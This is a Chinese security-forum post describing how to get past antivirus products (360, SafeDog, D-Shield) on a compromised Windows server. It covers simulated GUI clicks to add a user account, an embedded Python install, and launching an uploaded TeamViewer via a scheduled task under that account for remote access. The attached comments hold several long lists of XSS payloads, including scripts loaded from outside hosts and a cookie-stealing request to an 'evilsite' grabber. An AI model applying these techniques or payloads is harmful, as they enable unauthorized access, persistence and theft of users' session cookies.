Bypass AVs to Add Users
TheKingOfDuck 渗透测试 15015浏览 · 2019-02-16 01:45

0x01 About

嗯 这是一个企图Uninstall All AVs失败的产物

基本思路是模拟点击 输入

通过下面指令可运行360的卸载程序

cd "C:/Program Files/360/360safe/" & start uninst.exe

这程序的按钮有两个ShadowEdge保护

直接运行py脚本取点击会被拒绝

新建一个bat再用start来启动就可以绕过了

http://v.youku.com/v_show/id_XNDA1NzEyMzkyMA==.html?spm=a2h3j.8428770.3416059.1

如视频所示 模拟点击处最终确认按钮后无法点击

查阅资料得知这尼玛是360SPTools.exe设了很多阻碍 搞一天没突破

回念一想 不如直接添加用户 才有了本文

0x02 server

为了方便修改调整 采用Python做了本次任务的 不是每个目标上都有py的环境 所以手动配置咯

直接上传或使用下面脚本下载Python的embeddable版本到服务器(脚本不支持https 改半天实在没办法 需到Py官网下载后再上传到http的服务器上 带解压)

https://github.com/TheKingOfDuck/BypassAVAddUsers/blob/master/download.php

由于需要用到pywin32模块 该模块无法使用pip安装所以顺便安装一下

pip:

start python.exe ../get-pip.py

(踩坑经验:先修改环境目录下的python37._pth文件,去掉 #import site 前的注释再执行命令 否则也无法安装成功 不使用start来运行也安装不成功)

pywin32:

start python.exe -m pip install pywin32

执行完所有需要的依赖也就安装好了 无需GUI即可完成。

0x03 AddUsers

刚开始是想通过控制面板添加用户 可以通过脚本执行control userpasswords打开控制面板 但是步骤不叫繁琐 而且进程是explore 窗口不好控制。

可通过lusrmgr.msc(本地用户和组管理工具)来做。

打开后需要计算图中中间那个"用户"按钮的位置 经过测试发现 它到顶端的距离和到坐标的距离无人为调整的话是不会边的 所有可获取该窗口左上角点的坐标来计算其坐标

#输出MMCMainFrame的窗口名称
MMCMainFrame = win32gui.FindWindow("MMCMainFrame", None)
# print("#######################")
titlename = (win32gui.GetWindowText(MMCMainFrame))
# print(titlename)
# print("#######################")

hWndChildList = []
a = win32gui.EnumChildWindows(MMCMainFrame, lambda hWnd, param: param.append(MMCMainFrame),  hWndChildList)
# print(a)

#获取窗口左上角和右下角坐标
a, b, c, d = win32gui.GetWindowRect(MMCMainFrame)

a, b,即为需要的值

# 计算得出MMCMainFrame窗口的顶边距离“用户”这个标签120个坐标点 该值除非调动 否则不变
# userPosH = 237 -117
# print(userPosL)
# userPosL = 120
#计算得出MMCMainFrame窗口的坐标边距离“用户”这个标签120个坐标点 该值除非调动 否则不变
# userPosH = 1145 - 915
# print(userPosH)
# userPosH = 230

(a + 230, b + 120 )即为需要的值 实战中如有出入可采用PIL模块截图回传下来计算。

剩下的就是常规的模拟点击 模拟输入 完整代码见:

https://github.com/TheKingOfDuck/BypassAVAddUsers/blob/master/adduser.py

0x03 Test

360全家桶 安全狗 D盾 :

原视频在附件压缩包:

http://v.youku.com/v_show/id_XNDA1NzEyNTc1Ng==.html?spm=a2h3j.8428770.3416059.1

(云锁要求必须在服务区上安装 故尚未测试)

0x03 Summary

添加用户后如果服务器没开3389可上传一个单文件版本的teamviewer
再通过下面指令运行起来

schtasks /create /sc minute /mo 1 /tn “cat” /tr TV的路径  /ru 创建的用户名 /rp 创建的密码

使用PIL截图获取连接ID密码:

from PIL import ImageGrab
im = ImageGrab.grab()
im.save('screenshot.png')

如此一来就不用任何0day 全程合法文件的取得了远程桌面的权限。

7 条评论
某人
表情
可输入 255
TheKingOfDuck
2019-03-09 11:19 0 回复

<svg><style>{font-family:'<iframe/onload=confirm(1)>'</style></svg>


<input/onmouseover="javaSCRIPT:confirm(1)"


<svg><scRipt %00>alert(1) {Opera}</svg>

<img/src=%00 onerror=this.onerror=confirm


<form><isindex formaction="javascript:confirm(1)"

<img src=%00
onerror=alert(1)


<script/ src='https://dl.dropbox.com/u/13018058/js.js' / ></script>


<ScRipT 5-0*3?=>prompt(1)</ScRipT giveanswerhere=?


iframe/src="data:text/html; base64 ,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="


<script /%00/>/%00/alert(1)/%00/</script /%00/

"><h1/onmouseover='\u0061lert(1)'>%00


<iframe/src="data:text/html,<svg onload=alert(1)>"


<meta content="
1
; JAVASCRIPT: alert(1)" http-equiv="refresh">


<svg><script xlink:href=data:,window.open('https://www.blog.zsec.uk/')></script</svg>


<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}</svg>


<meta content="0;url=javascript:confirm(1)" http-equiv="refresh">


<iframe src=javascript:alert(document.location)>


X

</script><img/%00/src="worksinchrome:prompt(1)"/%00/onerror='eval(src)'>

<img/
src=~ onerror=prompt(1)>


<iframe
src="javascript:alert(1)"
;>

<a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="
>X</a

http://www.google<script .com>alert(document.location)</script

<a href=[�]"� onmouseover=prompt(1)//">XYZ</a

<img/src=@
onerror = prompt('1')


<style/onload=prompt('XSS'&#41


<script ^__^>alert(String.fromCharCode(49))</script

</style ><script :-(>//alert(document.location)//</script :-(

�</form><input type="date" onfocus="alert(1)">


<textarea
onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>


<script //>//confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')//</script //


<iframe srcdoc="&lt;body onload=prompt(1)&gt;"><br>
&lt;a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;&gt;X&lt;/a&gt;</p>
<p>&lt;script <del>~&gt;alert(0%0)&lt;/script ~</del>&gt;</p>
<p>&lt;style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;&gt;<br>
&lt;///style///&gt;&lt;span %2F onmousemove='alert&lpar;1&rpar;'&gt;SPAN<br>
&lt;img/src='<a href="http://i.imgur.com/P8mL8.jpg">http://i.imgur.com/P8mL8.jpg</a>' onmouseover=&Tab;prompt(1)<br>
&#34;&#62;<svg><style>{-o-link-source&colon;'&lt;body/onload=confirm(1)&gt;'<br>
&#13;&lt;blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)&gt;OnMouseOver {Firefox &amp; Opera}</p>
<p><marquee onstart='javascript:alert&#x28;1&#x29;'>^__^</p>
<p><a href="div/style="width:expression(confirm(1))"">div/style="width:expression(confirm(1))"</a>X&lt;/div&gt; {IE7}</p>
<p>&lt;iframe/%00/ src=javaSCRIPT&colon;alert(1)<br>
//&lt;form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;&gt;&lt;input/type='submit'&gt;//<br>
/<em>iframe/src</em>/<a href="mailto:iframe/src="&lt;iframe/src=@"/onload=prompt/*iframe/src*/">iframe/src="&lt;iframe/src=@"/onload=prompt/*iframe/src*/</a><br>
//|\ &lt;script //|\ src='<a href="https://dl.dropbox.com/u/13018058/js.js'&gt;">https://dl.dropbox.com/u/13018058/js.js'&gt;</a> //|\ &lt;/script //|\<br>
&lt;/font&gt;/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>
<a/href="javascript:&#13; javascript:prompt(1)"><input type="X">
</plaintext\></|\><plaintext/onmouseover=prompt(1)
</svg>''<svg>&lt;script 'AQuickBrownFoxJumpsOverTheLazyDog'&gt;alert&#x28;1&#x29; {Opera}<br>
<a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button></p>
<p><div onmouseover='alert&lpar;1&rpar;'>DIV</div></p>
<p><iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"><br>
<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a></p>
<p><embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"></p>
<p><object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"><br>
<var onmouseover="prompt(1)">On Mouse Over</var><br>
&lt;a href=javascript&colon;alert&lpar;document&period;cookie&rpar;&gt;Click Here&lt;/a&gt;<br>
&lt;img src="/" =_=" title="onerror='prompt(1)'"&gt;<br>
&lt;%<!--'%><script>alert(1);</script --></p>
<p><script src="data:text/javascript,alert(1)"></script></p>
<p>&lt;iframe/src \/\/onload = prompt(1)</p>
<p>&lt;iframe/onreadystatechange=alert(1)</p>
<p>&lt;svg/onload=alert(1)</p>
<p>&lt;input value=&lt;&gt;&lt;iframe/src=javascript:confirm(1)</p>
<p>&lt;input type="text" value=`` &lt;div/onmouseover='alert(1)'&gt;X&lt;/div&gt;<br>
<a href="http://www">http://www</a>.<script>alert(1)&lt;/script .com</p>
<p>&lt;iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29&gt;&lt;/iframe&gt;</p>
<p><svg>&lt;script ?&gt;alert(1)</p>
<p>&lt;iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29&gt;&lt;/iframe&gt;<br>
&lt;img src=<code>xx:xx</code>onerror=alert(1)&gt;</p>
<p><object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object></p>
<p><meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/></p>
<p><math>&lt;a xlink:href="//jsfiddle.net/t846h/"&gt;click</p>
<p>&lt;embed code="<a href="http://businessinfo.co.uk/labs/xss/xss.swf">http://businessinfo.co.uk/labs/xss/xss.swf</a>" allowscriptaccess=always&gt;</p>
<p>&lt;svg contentScriptType=text/vbs&gt;<script>MsgBox<br>
<a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X&lt;/a</p>
<p>&lt;iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u006worksinIE&gt;</p>
<p><script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')&lt;/script U</p>
<p>&lt;script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"&gt;&lt;/script a=\u0061 &amp; /=%2F</p>
<p>&lt;script/src=data&colon;text/j\u0061v\u0061&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116,\u0061%6C%65%72%74(/XSS/)&gt;&lt;/script</p>
<p>&lt;object data=javascript&colon;\u0061&#x6C;&amp;#101%72t(1)&gt;</p>
<p><script>++1-+?(1)</script></p>
<p>&lt;body/onload=&lt;!--&gt;&amp;#10alert(1)&gt;</p>
<p><script itworksinallbrowsers>/<em>&lt;script</em> */alert(1)&lt;/script<br>
&lt;img src ?itworksonchrome?\/onerror = alert(1)</p>
<p><svg><script>//&NewLine;confirm(1);</script </svg></p>
<p><svg>&lt;script onlypossibleinopera:-)&gt; alert(1)<br>
&lt;a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&amp;#97v&amp;#97script&#x3A;&amp;#97lert(1)&gt;ClickMe</p>
<p><script x> alert&lt;/script 1=2</p>
<p>&lt;div/onmouseover='alert(1)'&gt; style="x:"&gt;<br>
&lt;--<code>&lt;img/src=</code> onerror=alert(1)&gt; --!&gt;</p>
<p><a href="script/src=&amp;#100&amp;#97&amp;#116&amp;#97:text/&amp;#x6a&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x000070&amp;#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)">script/src=&amp;#100&amp;#97&amp;#116&amp;#97:text/&amp;#x6a&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x000070&amp;#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)</a>&lt;/script&gt;</p>
<p><div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x&lt;/button&gt;<br>
"&gt;&lt;img src=x onerror=window.open('<a href="https://www.zsec.uk');&gt;">https://www.zsec.uk');&gt;</a></p>
<p><form>&lt;button formaction=javascript&colon;alert(1)&gt;CLICKME</p>
<p><math>&lt;a xlink:href="//blog.zsec.uk"&gt;click</p>
<p>&lt;object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik&gt;&lt;/object&gt;</p>
<p><iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>

1Click Me

'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E

<scr\0ipt/src=http://xss.com/xss.js</script

%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E

' onmouseover=alert(/Black.Spook/)

">iframe%20src="http://blog.zsec.uk"%%203E
'<script
window.onload=function(){document.forms[0].message.value='1';}</script>

x”</title><img src%3dx onerror%3dalert(1)>


</form>
TheKingOfDuck
2019-03-09 11:18 0 回复


<SCRIPT/XSS SRC="http://blog.zsec.uk/xss.js"></SCRIPT>


<BODY onload!#$%&()*~+_.,:;?@[/|]^`=alert("XSS")>

<<script>alert("XSS");//<</script>


<SCRIPT SRC=http://blog.zsec.uk/xss.js?


<SCRIPT SRC=//blog.zsec.uk/.j>


<IMG SRC="javascript:alert('XSS')"


<iframe src=http://blog.zsec.uk/scriptlet.html <


<script>a=/XSS/
alert(a.source)</script>

";alert('XSS');//

</TITLE><script>alert("XSS");</script>


<input src="javascript:alert('XSS');" type="IMAGE">



<BODY ONLOAD=alert('XSS')>




<bgsound src="javascript:alert('XSS');"></bgsound>




<layer src="http://blog.zsec.uk/
scriptlet.html"></layer>


<link href="javascript:alert('XSS');" rel="stylesheet">


<link href="http://blog.zsec.uk/xss.css" rel="stylesheet">

<STYLE>@import'http://blog.zsec.uk/xss.css';</STYLE>


<meta content="&lt;http://blog.zsec.uk/xss.css&gt;; REL=stylesheet" http-equiv="Link">


<style>BODY{-moz-binding:url("http://blog.zsec.uk/xssmoz.xml#xss")}</style>


<xss style="behavior: url(xss.htc);"></xss>


<style>li {list-style-image: url("javascript:alert('XSS')");}</style>

  • XSS





    <meta content="0;url=javascript:alert('XSS');" http-equiv="refresh">


    <meta content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K" http-equiv="refresh">


    <meta content="0; URL=http://;URL=javascript:alert('XSS');" http-equiv="refresh">


    <iframe src="javascript:alert('XSS');"></iframe>










    <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>



    <xss style="xss:expression(alert('XSS'))">

    exp/<A STYLE='no\xss:noxss("**");

    xss:ex/
    XSS*//**pression(alert("XSS"))'></xss>


    <style type="text/javascript">alert('XSS');</style>


    <style>.XSS{background-image:url("javascript:alert('XSS')");}</style><A CLASS=XSS></A>


    <style type="text/css">BODY{background:url("javascript:alert('XSS')")}</style>

    <!--[if gte IE 4]>


    <script>alert('XSS');</script>

    <![endif]-->


    <base href="javascript:alert('XSS');//">


    <object data="http://blog.zsec.uk/scriptlet.html" type="text/x-scriptlet"></object>


    <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>


    <embed allowscriptaccess="always" src="http://blog.zsec.uk/xss.swf">


    <HTML xmlns:xss>

    <?import namespace="xss" implementation="http://blog.zsec.uk/xss.htc">


    xss:xssXSS/xss:xss

    </HTML>


    <XML ID=I><x><c>]]>
    </c></x></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>


    <xml id="xss"><IMG SRC="javascript:alert('XSS')"></xml>



    <XML SRC="xsstest.xml" ID=I></XML>


    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>




    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">

    <?import namespace="t" implementation="#default#time2">


    <t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>">

    </BODY></HTML>


    <script src="http://blog.zsec.uk/xss.jpg"></script>


    <meta content="USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;" http-equiv="Set-Cookie">


    <meta content="text/html; charset=UTF-7" http-equiv="CONTENT-TYPE"> <script>alert('XSS');</script>


    <script a="&gt;" src="http://blog.zsec.uk/xss.js"></script>


    <SCRIPT =">" SRC="http://blog.zsec.uk/xss.js"></SCRIPT>


    <SCRIPT a=">" '' SRC="http://blog.zsec.uk/xss.js"></SCRIPT>


    <SCRIPT "a='>'" SRC="http://blog.zsec.uk/xss.js"></SCRIPT>


    <SCRIPT a=> SRC="http://blog.zsec.uk/xss.js"></SCRIPT>


    <script a="&gt;'&gt;" src="http://blog.zsec.uk/xss.js"></script>


    <script>document.write("<SCRI");</script>PT SRC="http://blog.zsec.uk/xss.js"></SCRIPT>


    XSS


    XSS


    XSS


    XSS


    XSS


    XSS


    XSS


    XSS


    XSS


    XSS


    XSS


    XSS


    XSS


    XSS


    <iframe %00 src=" javascript:prompt(1) "%00>


TheKingOfDuck
2019-03-09 11:17 0 回复



'"></title><script>alert(1111)</script>

</textarea>'"><script>alert(document.cookie)</script>

'""><script language="JavaScript"> alert('X nS nS');</script>

</script></script><<<<script><>>>><<<script>alert(123)</script>


<input src="javascript:alert('XSS');" type="IMAGE">

'></select><script>alert(123)</script>

'>"><script src = 'http://www.site.com/XSS.js'></script>

}</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>


<noalert><noscript>(123)</noscript><script>(123)</script></noalert>


<IMG SRC=JaVaScRiPt:alert('XSS')>


<IMG SRC=javascript:alert('XSS')>



<IMG SRC=javascript:alert("RSnake says, 'XSS'")>






<BODY onload!#$%&()*~+_.,:;?@[/|]^`=alert("XSS")>


SCRIPT/SRC="http://blog.zsec.uk/xss.js"</SCRIPT>

<<script>alert("XSS");//<</script>


<SCRIPT SRC=//blog.zsec.uk/.j>


<IMG SRC="javascript:alert('XSS')"


<iframe src=http://blog.zsec.uk/scriptlet.html <

";alert('XSS');//

</TITLE><script>alert("XSS");</script>


<input src="javascript:alert('XSS');" type="IMAGE">





<style>li {list-style-image: url("javascript:alert('XSS')");}</style>

  • XSS</br>




    <BODY ONLOAD=alert('XSS')>


    <bgsound src="javascript:alert('XSS');"></bgsound>




    <link href="javascript:alert('XSS');" rel="stylesheet">


    <link href="http://blog.zsec.uk/xss.css" rel="stylesheet">

    <STYLE>@import'http://blog.zsec.uk/xss.css';</STYLE>


    <meta content="&lt;http://blog.zsec.uk/xss.css&gt;; REL=stylesheet" http-equiv="Link">


    <style>BODY{-moz-binding:url("http://blog.zsec.uk/xssmoz.xml#xss")}</style>

    <STYLE>@import'javascript:alert("XSS")';</STYLE>



    <style>.XSS{background-image:url("javascript:alert('XSS')");}</style><A CLASS=XSS></A>


    <style type="text/css">BODY{background:url("javascript:alert('XSS')")}</style>


    <xss style="xss:expression(alert('XSS'))"></xss>


    <xss style="behavior: url(xss.htc);">

    <a href="javascript:alert(-1)">hello</a>

    <a href="javascript:alert(-1)"

    Hello

    <a <!-- href="javascript:alert(31337);">Hello</a>

    <map name="planetmap"><area a-="&gt;" coords="0,0,145,126" href="javascript:alert(-1)" shape="rect"></map></xss>


    <IMG SRC=javascript:alert('XSS')>


    <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>


    <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

    " onhover="javascript:alert(-1)"

    "><script>alert('test')</script>

    ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//></SCRIPT>--!><script>alert(String.fromCharCode(88,83,83))</script>


    <SCRIPT SRC=http://blog.zsec.uk/xss.js></SCRIPT>



    <IMG SRC=JaVaScRiPt:alert('XSS')>


    <IMG SRC=javascript:alert("XSS")>


    <IMG SRC=javascript:alert("RSnake says, 'XSS'")>


    <IMG """><script>alert("XSS")</script>">


    <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>


    <IMG SRC=javascript:alert('XSS')>


    <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>


    <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>






    <IMG


    SRC


    "

    j

    a

    v

    a

    s

    c

    r

    i

    p

    t

    :

    a

    l

    e

    r

    t

    (

    '

    X

    S

    S

    '

    )

    "

    >


TheKingOfDuck
2019-03-09 11:16 0 回复

No dos expression vector <i style=x:expression(alert(URL=1))>


<svg><style>*{font-family:'<svg onload="alert(1)">';}</svg></style></svg>

JSLR( @garethheyes ) challenge result:

@irsdl challenge result:


Vbscript XHR by @masa141421356

XML Entity XSS by @garethheyes

Webkit <svg/onload=domain=id> cross-domain and less vector! example: (JSFiddle cross to JSBin) by @jackmasa

<style>@import//evil? >>>steal me!<<< scriptless by @garethheyes

IE <input value="<script>alert(1)</script>" ` /> by @hasegawayosuke


<xmp><img alt="</xmp><img src=xx:x onerror=alert(1)//"> Classic vector by slacker :D

name Classic html entity inject vector

A nice opera xss: Put 65535 Bytes before and Unicode Sign by @insertScript


<iframe src="jar://html5sec.org/test.jar!/test.html"></iframe> Upload a jar file => Firefox XSS by @0x6D6172696F

JS Array Hijacking with MBCS encodings ppt by @hasegawayosuke


<meta content="0;url=http://good/[&gt;&gt;&gt;inj];url=http://evil/[&lt;&lt;&lt;inj]" http-equiv="refresh"> IE6-7 Inject vector by @kinugawamasato

IE UTF7 BOM XSS <link rel=stylesheet href='data:,?*%7bx:expression(alert(1))%7D' > by @garethheyes


<svg><script>a='<svg onload="alert(1)"></svg>';alert(2)</script> by @0x6D6172696F , @jackmasa</script></svg>

Opera <svg><animation x:href=javascript:alert(1)> SVG animation vector by @0x6D6172696F</svg>


<meta charset=gbk><script>a='xࠄ\';alert(1)//';</script> by @garethheyes

FF CLICK by @0x6D6172696F


<noscript> by @jackmasa H5SC:
click non-IE
click Firefox
<link href="javascript:alert(1)" rel="next"> Opera, pressing the spacebar execute!
<embed allowscriptaccess="always" code="http://businessinfo.co.uk/labs/xss/xss.swf">

"><script>alert(0)</script>
<script src="http://yoursite.com/your_files.js"></script>
<script>alert(/xss/)</script>
<script>alert(/xss/)</script>


<font style="color:expression(alert(document.cookie))">

<script language="JavaScript">alert('XSS')</script>
[url=javascript:alert('XSS');]click me[/url]

<script>alert(1);</script>
<script>alert('XSS');</script>
<script src="http://www.evilsite.org/cookiegrabber.php"></script>
<script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="??(document.cookie)</script>
<scr<script>ipt>alert('XSS');ipt>
<script>alert(String.fromCharCode(88,83,83))</script>

<style>@import'javascript:alert("XSS")';</style>
alert("XSS")'); ?>
<marquee><script>alert('XSS')</script></marquee>



window.alert("Bonjour !");
</scr<script></font></noscript>

<font style="color:expression(alert(document.cookie))">
<iframe<?php chr(11)?="" echo=""> onload=alert('XSS')>
"><script alert(string.fromcharcode(88,83,83))<="" script="">
'>><marquee><h1>XSS</h1></marquee>
'">><script>alert('XSS')</script>
'">><marquee>

XSS

</marquee>
<meta content="0;url=javascript:alert('XSS');" http-equiv="refresh">
<meta content="0; URL=http://;URL=javascript:alert('XSS');" http-equiv="refresh">
<script>var var = 1; alert(var)</script>
<style type="text/css">BODY{background:url("javascript:alert('XSS')")}</style>
alert("XSS")'?>

" onfocus=alert(document.domain) "> <"

<style>li {list-style-image: url("javascript:alert('XSS')");}</style>
  • XSS
    perl -e 'print "<scr\0ipt>alert("XSS")</scr\0ipt>";' > out
    perl -e 'print "";' > out


    <scrscriptipt>alert(1)</scrscriptipt>


    <script>alert(1)</script>
    <script>document.write("XSS");</script>
    a="get";b="URL";c="javascript:";d="alert('xss');";eval(a?);
    ='><script>alert("xss")</script>
    <form action="javas cript:alert(1)">
    <label>This is a searchable index. Enter search keywords: <input name="isindex" type="image"></label>
    </form>
    <script?=">"?="yoursite.com/xss.js?69,69">
    <script>alert(navigator.userAgent)</script>>
    ">/XaDoS/><script>alert(document.cookie)</script>
    <script> src="www.site.com/XSS.js"></script>
    ">/KinG-InFeT.NeT/><script>alert(document.cookie)</script>
    src="www.site.com/XSS.js">
    ">
    [color=red width=expression(alert(123))][color]
    <base href="javascript:alert('XSS');//">
    Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
    "><script>alert(123)</script></script?=">
</iframe<?php></font>
TheKingOfDuck
2019-03-09 11:16 0 回复

IE xss filter bypass 0day :<script/%00%00v%00%00>alert(/@jackmasa/)</script> and %c0″//(%000000%0dalert(1)// #IE #0day

new XMLHttpRequest().open("GET", "data:text/html,<svg onload=alert(/@irsdl/)></svg>", false); #firefox #datauri


<h1 onerror=alert(/@0x6D6172696F/)>XSS</h1><style>*:after{content:url()}</style> #firefox


<script for= event=onerror()>alert(/@ma1/)</script><img id= src=> #IE

"<a href=javascript&.x3A;alert&(x28;1&)x29;//=>clickme #IE #xssfilter @kinugawamasato

Components.lookupMethod(self, 'alert')(1) #firefox

external.NavigateAndFind(' ',[],[]) #IE #URLredirect

<?php header('content-type:text/html;charset=utf-7-utf-8-shift_jis');?> IE decides charset as #utf-7 @hasegawayosuke


<meta http-equiv=refresh content="0 javascript:alert(1)"> #opera


<meta http-equiv=refresh content="?,javascript:alert(1)"> #chrome


<svg contentScriptType=text/vbs><script>MsgBox"@insertScript"<i> #IE9 #svg #vbscript<br>
setTimeout(['alert(/@garethheyes/)']); #chrome #safari #firefox</p>
<p><svg>&lt;/ y="&gt;&lt;x" onload=alert('@0x6D6172696F')&gt; #svg<br>
Event.prototype[0]='@garethheyes',Event.prototype.length=1;Event.prototype.toString=[].join;onload=alert #webkit #opera<br>
URL-redirect vuln == XSS ! Location:data:text/html,&lt;svg/onload=alert(document.domain)&gt; #Opera @jackmasa<br>
<a href="data:application/x-x509-user-cert;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">click</a>​ #Chrome #XSS @RSnake<br>
Clipboard-hijack without script and css: http://&lt;bdo dir=rtl&gt;elgoog&lt;/bdo&gt;.com<br>
Opera:<style>*{-o-link:'data:text/html,<svg/onload=alert(/@garethheyes/)>';-o-link-source:current}</style><a href=1>aaa<br>
$=&lt;&gt;@mozilla.org/js/function&lt;/&gt;;$::<a href="/@superevr/">&lt;&gt;alert&lt;/&gt;</a> #firefox<br>
Firefox cookie xss: with(document)cookie='∼≩≭≧∯≳≲≣∽≸≸∺≸∠≯≮≥≲≲≯≲∽≡≬≥≲≴∨∱∩∾',write(cookie); by @jackmasa</p>
<p><svg><script>location&equals;&#60&#62javascript&amp;#x3A;alert(1)&#60&#33&#47&#62;</script> #Firefox #JustForFun

Just don't support IE <a href=[0x0b]" onclick=alert(1)//">click</a>


<style>//<!--</style> -->*{x:expression(alert(/@jackmasa/))}//<style></style>

<input #ie="" #xss<br="" &gt;="" value="--&gt;&lt;body/onload=&lt;code&gt;alert(/ @jackmasa /)//&lt;/code&gt;">
Input[hidden] XSS <input type=hidden style=x:expression(alert(/ @garethheyes /))> target it.

Firefox clipboard-hijack without script and css : http://

<![<img src=x:x onerror=alert(/ @jackmasa /)//]-->


E4X <{alert(1)}></{alert(2)}>.(alert(3)).@wtf.(wtf) by @garethheyes


vbscript coool feature chr(&H4141)="A", Chr(7^5)=A and Chr(&O41) =‘A’ by @masa141421356


({})[$='\143\157\156\163\164\162\165\143\164\157\162']$()

